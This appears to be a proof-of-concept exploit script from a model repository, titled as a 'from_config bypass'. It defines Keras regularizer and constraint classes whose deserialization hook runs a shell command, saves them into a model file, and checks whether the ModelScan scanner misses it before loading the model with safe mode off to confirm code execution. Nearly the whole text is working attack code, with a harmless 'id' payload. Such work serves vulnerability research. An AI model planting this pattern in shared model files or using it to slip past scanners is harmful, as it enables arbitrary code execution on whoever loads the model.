xiaoyaoes's picture
Regularizer+Constraint from_config bypass
9e64981
import tensorflow as tf, keras, os, sys
# Register both malicious classes
@keras.saving.register_keras_serializable(package='MyReg')
class BadReg(tf.keras.regularizers.L2):
@classmethod
def from_config(cls, config):
import os; os.system('id > /tmp/REG_RCE')
return super().from_config({'l2': 0.01})
@keras.saving.register_keras_serializable(package='MyConstr')
class BadConstr(tf.keras.constraints.MaxNorm):
@classmethod
def from_config(cls, config):
import os; os.system('id > /tmp/CONSTRAINT_RCE')
return super().from_config({'max_value': 2.0})
inputs = tf.keras.Input(shape=(5,))
x = tf.keras.layers.Dense(8,
kernel_regularizer=BadReg(0.01),
kernel_constraint=BadConstr(2.0),
activation='relu')(inputs)
outputs = tf.keras.layers.Dense(1)(x)
model = tf.keras.Model(inputs, outputs)
model.save('model.keras')
print(f"Saved model.keras")
# ModelScan test
sys.path.insert(0, '/tmp/modelscan')
from modelscan.modelscan import ModelScan
from modelscan.settings import DEFAULT_SETTINGS
r = ModelScan(DEFAULT_SETTINGS).scan('model.keras')
print(f"ModelScan: I={len(r.get('issues',[]))} E={len(r.get('errors',[]))} S={len(r.get('skipped',[]))}")
del model, BadReg, BadConstr
import gc; gc.collect()
loaded = tf.keras.models.load_model('model.keras', safe_mode=False)
print(f"Regularizer RCE: {os.path.exists('/tmp/REG_RCE')}")
print(f"Constraint RCE: {os.path.exists('/tmp/CONSTRAINT_RCE')}")